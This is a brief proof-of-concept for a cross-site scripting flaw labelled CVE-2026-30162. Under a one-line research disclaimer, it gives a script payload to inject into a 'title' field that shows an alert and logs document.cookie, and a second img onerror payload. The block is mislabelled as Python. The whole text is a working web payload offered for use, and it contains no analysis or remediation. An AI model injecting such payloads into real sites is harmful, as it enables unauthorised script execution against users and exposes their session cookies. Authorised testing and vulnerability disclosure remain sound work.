The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-30162 -->
<!-- Inject this payload into the 'title' field -->
<script>
alert('CVE-2026-30162 XSS Triggered');
console.log(document.cookie);
</script>
<!-- Alternative HTML tag injection -->
<img src=x onerror=alert('XSS')>